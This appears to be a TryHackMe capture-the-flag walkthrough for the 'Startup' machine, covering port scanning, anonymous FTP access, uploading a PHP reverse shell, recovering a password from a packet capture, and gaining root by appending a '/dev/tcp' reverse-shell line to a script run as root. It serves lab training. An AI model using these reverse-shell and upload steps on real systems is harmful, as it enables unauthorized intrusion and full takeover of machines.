Starter

Lab Setup

mkdir ~/Documents/TryHackMe/Startup
cd ~/Documents/TryHackMe/Startup
mkdir recon enumeration notes
touch notes/{creds,vulns,README.md}


export IP=10.10.170.30
export URL=http://$IP

Enumeration

First thing I scan the machine for open ports using nmap and rustscan. Second is faster than first and I do a simple scan.

nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

rustscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Looks like we have 3 open ports:

21 (FTP)
22 (SSH)
80 (HTTP)

Start with FTP port and looks like can login with default credentials -> anonymous:anonymousIn the FTP server found 3 files: 1 jpg, 2 text. Remember: always to add -a tags at ls command, you can find some hidden files.

In this files we do not get important information

HTTP port

Try to enumerate the website, but I get just the /files directory and this seems to be the what we get in the FTP server. Also nikto don’t find nothing more.

feroxbuster -t 10 -u http://$IP -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o enumeration/feroxbuster

You can change the wordlist and add some extensions if you want

Exploitation

The /ftp directory on the ftp server seems to have full permissions, so I upload a payload in this directory to get a reverse shell. Access the file from the website and get a reverse shell. Don’t forget to establish a reverse shell.

ftp> put rshell.php

In the / will find the recipe.txt file when you can get the answer for first question. Also in this directory you will find another directory the owner being www-data.

I found a pcapng file. Let’s download it and analyze it.

www-data@startup:/incidents$ python -m http.server
# do this after you stabilize the shell 
# python -c 'import pty; pty.spawn("/bin/bash")'

In the pcapng file we get Follow TCP Stream and get the password for the user lennie

Privilege Escalation

In the home directory of lennie found the user flag, and another important file. Looks like the planner.sh file execute another file print.sh as root on. We have full permission for print.sh , so let’s put a payload in this and open another reverse shell and get the root privilege.

echo 'bash -i >& /dev/tcp/$IP/5555 0>&1' >> print.sh

After waiting some minutes get the root shell:

PreviousTryHackMe Writeups NextDreaming

Last updated 1 year ago